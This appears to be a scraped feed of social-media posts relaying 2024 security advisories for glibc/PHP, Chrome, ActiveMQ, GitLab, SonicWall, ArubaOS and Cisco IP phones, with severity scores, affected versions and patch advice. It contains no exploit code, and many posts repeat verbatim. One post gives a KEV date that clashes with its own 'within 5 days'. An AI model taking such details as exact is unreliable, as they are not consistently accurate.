CVE-2024-2961 - glibc Vulnerability Opens Door to PHP Attacks: Patch Immediately https://securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/

#glibc Vulnerability Opens Door to #PHP Attacks

https://securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/

#cybersecurity #FOSS #CVE

glibc iconv buffer overflow vulnerability that can be used for remote code execution on servers running PHP. Present for 24 years. This is the kind of stuff Rust was made for.

- https://www.openwall.com/lists/oss-security/2024/04/18/4
- https://nvd.nist.gov/vuln/detail/CVE-2024-2961
- https://rockylinux.org/news/glibc-vulnerability-april-2024/

A vulnerability (CVE-2024-2961) that may affect PHP applications is receiving patches on many operating systems. It's advised to update & restart your systems where patches are available.

Ubuntu/Debian/Fedora appear to have patches available for supported systems. Rocky has some checking/workaround guidance here:

https://rockylinux.org/news/glibc-vulnerability-april-2024/

There is a new PHP vulnerability out. It is being tracked as CVE-2024-2961. Here’s a video explaining the vulnerability https://youtu.be/u8jLUjpCWrs?si=Fm1JSBdAW9VBzuhj #cve #vulnerability #hacking #php #linux #news #Security

CVE-2024-2961 - glibc Vulnerability Opens Door to PHP Attacks: Patch Immediately https://securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/

#glibc Vulnerability Opens Door to #PHP Attacks

https://securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/

#cybersecurity #FOSS #CVE

glibc iconv buffer overflow vulnerability that can be used for remote code execution on servers running PHP. Present for 24 years. This is the kind of stuff Rust was made for.

- https://www.openwall.com/lists/oss-security/2024/04/18/4
- https://nvd.nist.gov/vuln/detail/CVE-2024-2961
- https://rockylinux.org/news/glibc-vulnerability-april-2024/

A vulnerability (CVE-2024-2961) that may affect PHP applications is receiving patches on many operating systems. It's advised to update & restart your systems where patches are available.

Ubuntu/Debian/Fedora appear to have patches available for supported systems. Rocky has some checking/workaround guidance here:

https://rockylinux.org/news/glibc-vulnerability-april-2024/

There is a new PHP vulnerability out. It is being tracked as CVE-2024-2961. Here’s a video explaining the vulnerability https://youtu.be/u8jLUjpCWrs?si=Fm1JSBdAW9VBzuhj #cve #vulnerability #hacking #php #linux #news #Security

tl;dr: upgrade glibc on your servers!

Summing it up, there's a vulnerability (CVE-2024-2961) on glibc that, apparently, can be used to get RCE on servers running PHP.
It's recommended that you update glibc to a patched version.

https://security-tracker.debian.org/tracker/CVE-2024-2961
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2024-2961

There's an upcoming talk on May 10 where the researcher will explain how it was used to hack PHP servers.

https://www.offensivecon.org/speakers/2024/charles-fol.html

#PHP #glibc #iconv

@ramsey it's this one CVE-2024-2961 https://security-tracker.debian.org/tracker/CVE-2024-2961

"No way to prevent this" say users of only language where this regularly happens

https://xeiaso.net/shitposts/no-way-to-prevent-this/CVE-2024-2961/

Google Chrome security advisory: Stable Channel Update for Desktop

• CVE-2024-4331 (high severity) Use after free in Picture In Picture
• CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368

Google Chrome security advisory: Stable Channel Update for Desktop

• CVE-2024-4331 (high severity) Use after free in Picture In Picture
• CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368

Google Chrome security advisory: Stable Channel Update for Desktop

• CVE-2024-4331 (high severity) Use after free in Picture In Picture
• CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368

Google Chrome security advisory: Stable Channel Update for Desktop

• CVE-2024-4331 (high severity) Use after free in Picture In Picture
• CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368

Google Chrome security advisory: Stable Channel Update for Desktop

• CVE-2024-4331 (high severity) Use after free in Picture In Picture
• CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368

Google Chrome security advisory: Stable Channel Update for Desktop

• CVE-2024-4331 (high severity) Use after free in Picture In Picture
• CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368

Google Chrome security advisory: Stable Channel Update for Desktop

• CVE-2024-4331 (high severity) Use after free in Picture In Picture
• CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368

Google Chrome security advisory: Stable Channel Update for Desktop

• CVE-2024-4331 (high severity) Use after free in Picture In Picture
• CVE-2024-4368 (high) Use after free in Dawn

2 vulnerabilities, both externally reported. No mention of exploitation.

#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368

Apache ActiveMQ security advisory: CVE-2024-32114 - Jolokia and REST API were not secured with default configuration
CVE-2024-32114 (8.5 high) Insecure Default Initialization of Resource (Jolokia JMX REST API and the Message REST API). A malicious actor could interact with the broker using Jolokia JMX REST API, or produce/consume messages or purge/delete destinations using the Message REST API. The impact of CVE-2024-32114 is unauthorized data access, data loss, or service disruption, severely compromising the application’s integrity and availability. Fixed in Apache ActiveMQ 6.1.2. Mitigation is to update the default conf/jetty.xml configuration file to add authentication requirement (see advisory for details)

See SOCRadar blog post New High-Severity Vulnerability in Apache ActiveMQ Poses Risk of Unauthorized Access: CVE-2024-32114

Why you should care about CVE-2024-32114:
A previous Apache ActiveMQ vulnerability CVE-2023-46604 (rated 10.0 maximum severity, disclosed 27 October 2023 by Apache) was exploited almost immediately and added to CISA's KEV Catalog on 02 November 2024 (within 5 days). It is known to be exploited by ransomware groups.

#CVE_2024_32114 #Apache #ActiveMQ #Vulnerability

Apache ActiveMQ security advisory: CVE-2024-32114 - Jolokia and REST API were not secured with default configuration
CVE-2024-32114 (8.5 high) Insecure Default Initialization of Resource (Jolokia JMX REST API and the Message REST API). A malicious actor could interact with the broker using Jolokia JMX REST API, or produce/consume messages or purge/delete destinations using the Message REST API. The impact of CVE-2024-32114 is unauthorized data access, data loss, or service disruption, severely compromising the application’s integrity and availability. Fixed in Apache ActiveMQ 6.1.2. Mitigation is to update the default conf/jetty.xml configuration file to add authentication requirement (see advisory for details)

See SOCRadar blog post New High-Severity Vulnerability in Apache ActiveMQ Poses Risk of Unauthorized Access: CVE-2024-32114

Why you should care about CVE-2024-32114:
A previous Apache ActiveMQ vulnerability CVE-2023-46604 (rated 10.0 maximum severity, disclosed 27 October 2023 by Apache) was exploited almost immediately and added to CISA's KEV Catalog on 02 November 2024 (within 5 days). It is known to be exploited by ransomware groups.

#CVE_2024_32114 #Apache #ActiveMQ #Vulnerability

Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_24.html

• CVE-2024-4058 (critical) Type Confusion in ANGLE
• CVE-2024-4059 (high) Out of bounds read in V8 API
• CVE-2024-4060 (high) Use after free in Dawn

#Google #Chrome #vulnerability #PatchTuesday #CVE_2024_4058 #CVE_2024_4059 #CVE_2024_4060

Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_24.html

• CVE-2024-4058 (critical) Type Confusion in ANGLE
• CVE-2024-4059 (high) Out of bounds read in V8 API
• CVE-2024-4060 (high) Use after free in Dawn

#Google #Chrome #vulnerability #PatchTuesday #CVE_2024_4058 #CVE_2024_4059 #CVE_2024_4060

Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_24.html

• CVE-2024-4058 (critical) Type Confusion in ANGLE
• CVE-2024-4059 (high) Out of bounds read in V8 API
• CVE-2024-4060 (high) Use after free in Dawn

#Google #Chrome #vulnerability #PatchTuesday #CVE_2024_4058 #CVE_2024_4059 #CVE_2024_4060

Jenkins security advisory from 17 April 2024 patched against the Terrapin Attack vulnerability CVE-2023-48795 🔗 https://www.jenkins.io/security/advisory/2024-04-17/

#CVE_2023_48795 #Terrapin #vulnerability #Jenkins

Jenkins security advisory from 17 April 2024 patched against the Terrapin Attack vulnerability CVE-2023-48795 🔗 https://www.jenkins.io/security/advisory/2024-04-17/

#CVE_2023_48795 #Terrapin #vulnerability #Jenkins

The U.S. Cybersecurity and Infrastructure Security Agency (#CISA) warns #GitLab users of a 100-day-old, maximum severity vulnerability.

#CVE20237028 has a perfect CVSS score of 10. In #SBBlogwatch, we double-check our versions. At @TechstrongGroup’s @SecurityBlvd: https://securityboulevard.com/2024/05/gitlab-cvss-10-cisa-richixbw/?utm_source=richisoc&utm_medium=social&utm_content=richisoc&utm_campaign=richisoc

CISA: CISA Adds One Known Exploited Vulnerability to Catalog
HOT OFF THE PRESS! CISA adds CVE-2023-7028 (10.0 critical, disclosed 12 January 2024 by GitLab) GitLab Community and Enterprise Editions Improper Access Control Vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog!

Why you should care about CVE-2023-7028:

This is a zero-click account takeover that people were freaking out about less than 4 months ago. Successful exploitation allows attackers to send password reset emails for a targeted account to an attacker-controlled email address, allowing the threat actor to change the password and take over the account.

cc: @campuscodi @serghei @todb

#kev #eitw #knownexploitedvulnerabilitiescatalog #vulnerability #CVE_2023_7028

CISA: CISA Adds One Known Exploited Vulnerability to Catalog
HOT OFF THE PRESS! CISA adds CVE-2023-7028 (10.0 critical, disclosed 12 January 2024 by GitLab) GitLab Community and Enterprise Editions Improper Access Control Vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog!

Why you should care about CVE-2023-7028:

This is a zero-click account takeover that people were freaking out about less than 4 months ago. Successful exploitation allows attackers to send password reset emails for a targeted account to an attacker-controlled email address, allowing the threat actor to change the password and take over the account.

cc: @campuscodi @serghei @todb

#kev #eitw #knownexploitedvulnerabilitiescatalog #vulnerability #CVE_2023_7028

GitLab Password Reset Vulnerability (CVE-2023-7028) https://fortiguard.fortinet.com/threat-signal-report/5433

Related: "CISA Warns of Active Exploitation of Severe GitLab Password Reset Vulnerability"

"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical flaw impacting #GitLab to its Known Exploited Vulnerabilities (KEV) catalog, owing to active exploitation in the wild.

Tracked as CVE-2023-7028 (CVSS score: 10.0), the maximum severity vulnerability could facilitate account takeover by sending password reset emails to an unverified email address."
👇
https://thehackernews.com/2024/05/cisa-warns-of-active-exploitation-of.html

# CISA Adds CVE-2023-7028 - #GitLab Community and Enterprise Editions Improper Access Control Vulnerability to Catalog #cybersecurity #infosec https://www.cisa.gov/news-events/alerts/2024/05/01/cisa-adds-one-known-exploited-vulnerability-catalog @cisacyber

Related: "CISA Warns of Active Exploitation of Severe GitLab Password Reset Vulnerability"

"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical flaw impacting #GitLab to its Known Exploited Vulnerabilities (KEV) catalog, owing to active exploitation in the wild.

Tracked as CVE-2023-7028 (CVSS score: 10.0), the maximum severity vulnerability could facilitate account takeover by sending password reset emails to an unverified email address."
👇
https://thehackernews.com/2024/05/cisa-warns-of-active-exploitation-of.html

# CISA Adds CVE-2023-7028 - #GitLab Community and Enterprise Editions Improper Access Control Vulnerability to Catalog #cybersecurity #infosec https://www.cisa.gov/news-events/alerts/2024/05/01/cisa-adds-one-known-exploited-vulnerability-catalog @cisacyber

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

• CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
• CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

• CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
• CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

• CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
• CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

• CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
• CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

CVE-2024-26304: CVSS 9.8

There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote codeby sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

CVSS 9.8 Buffer overflow -> RCE in ArubaOS:

There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

Affected Products 
================= 
HPE Aruba Networking 
  - Mobility Conductor (formerly Mobility Master) 
  - Mobility Controllers 
  - WLAN Gateways and SD-WAN Gateways managed by Aruba Central 
  
Affected Software Versions: 
  - ArubaOS 10.5.x.x:       10.5.1.0 and below 
  - ArubaOS 10.4.x.x:       10.4.1.0 and below 
  - ArubaOS 8.11.x.x:       8.11.2.1 and below 
  - ArubaOS 8.10.x.x:       8.10.0.10 and below 
  
The following ArubaOS and SD-WAN software versions that are End 
of Maintenance are affected by these vulnerabilities and are not 
patched by this advisory: 
  - ArubaOS 10.3.x.x:          all 
  - ArubaOS 8.9.x.x:           all 
  - ArubaOS 8.8.x.x:           all 
  - ArubaOS 8.7.x.x:           all 
  - ArubaOS 8.6.x.x:           all 
  - ArubaOS 6.5.4.x:           all 
  - SD-WAN 8.7.0.0-2.3.0.x:    all 
  - SD-WAN 8.6.0.4-2.2.x.x:    all 

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

CVE-2024-26304: CVSS 9.8

There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote codeby sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

CVSS 9.8 Buffer overflow -> RCE in ArubaOS:

There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

Affected Products 
================= 
HPE Aruba Networking 
  - Mobility Conductor (formerly Mobility Master) 
  - Mobility Controllers 
  - WLAN Gateways and SD-WAN Gateways managed by Aruba Central 
  
Affected Software Versions: 
  - ArubaOS 10.5.x.x:       10.5.1.0 and below 
  - ArubaOS 10.4.x.x:       10.4.1.0 and below 
  - ArubaOS 8.11.x.x:       8.11.2.1 and below 
  - ArubaOS 8.10.x.x:       8.10.0.10 and below 
  
The following ArubaOS and SD-WAN software versions that are End 
of Maintenance are affected by these vulnerabilities and are not 
patched by this advisory: 
  - ArubaOS 10.3.x.x:          all 
  - ArubaOS 8.9.x.x:           all 
  - ArubaOS 8.8.x.x:           all 
  - ArubaOS 8.7.x.x:           all 
  - ArubaOS 8.6.x.x:           all 
  - ArubaOS 6.5.4.x:           all 
  - SD-WAN 8.7.0.0-2.3.0.x:    all 
  - SD-WAN 8.6.0.4-2.2.x.x:    all 

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

CVE-2024-26304: CVSS 9.8

There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote codeby sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

CVSS 9.8 Buffer overflow -> RCE in ArubaOS:

There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

Affected Products 
================= 
HPE Aruba Networking 
  - Mobility Conductor (formerly Mobility Master) 
  - Mobility Controllers 
  - WLAN Gateways and SD-WAN Gateways managed by Aruba Central 
  
Affected Software Versions: 
  - ArubaOS 10.5.x.x:       10.5.1.0 and below 
  - ArubaOS 10.4.x.x:       10.4.1.0 and below 
  - ArubaOS 8.11.x.x:       8.11.2.1 and below 
  - ArubaOS 8.10.x.x:       8.10.0.10 and below 
  
The following ArubaOS and SD-WAN software versions that are End 
of Maintenance are affected by these vulnerabilities and are not 
patched by this advisory: 
  - ArubaOS 10.3.x.x:          all 
  - ArubaOS 8.9.x.x:           all 
  - ArubaOS 8.8.x.x:           all 
  - ArubaOS 8.7.x.x:           all 
  - ArubaOS 8.6.x.x:           all 
  - ArubaOS 6.5.4.x:           all 
  - SD-WAN 8.7.0.0-2.3.0.x:    all 
  - SD-WAN 8.6.0.4-2.2.x.x:    all 

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

CVE-2024-26304: CVSS 9.8

There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote codeby sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

CVSS 9.8 Buffer overflow -> RCE in ArubaOS:

There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

Affected Products 
================= 
HPE Aruba Networking 
  - Mobility Conductor (formerly Mobility Master) 
  - Mobility Controllers 
  - WLAN Gateways and SD-WAN Gateways managed by Aruba Central 
  
Affected Software Versions: 
  - ArubaOS 10.5.x.x:       10.5.1.0 and below 
  - ArubaOS 10.4.x.x:       10.4.1.0 and below 
  - ArubaOS 8.11.x.x:       8.11.2.1 and below 
  - ArubaOS 8.10.x.x:       8.10.0.10 and below 
  
The following ArubaOS and SD-WAN software versions that are End 
of Maintenance are affected by these vulnerabilities and are not 
patched by this advisory: 
  - ArubaOS 10.3.x.x:          all 
  - ArubaOS 8.9.x.x:           all 
  - ArubaOS 8.8.x.x:           all 
  - ArubaOS 8.7.x.x:           all 
  - ArubaOS 8.6.x.x:           all 
  - ArubaOS 6.5.4.x:           all 
  - SD-WAN 8.7.0.0-2.3.0.x:    all 
  - SD-WAN 8.6.0.4-2.2.x.x:    all 

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

• CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
• CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
• CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

• CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
• CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
• CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

• CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
• CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
• CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

• CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
• CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
• CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

• CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
• CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
• CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

• CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
• CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
• CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

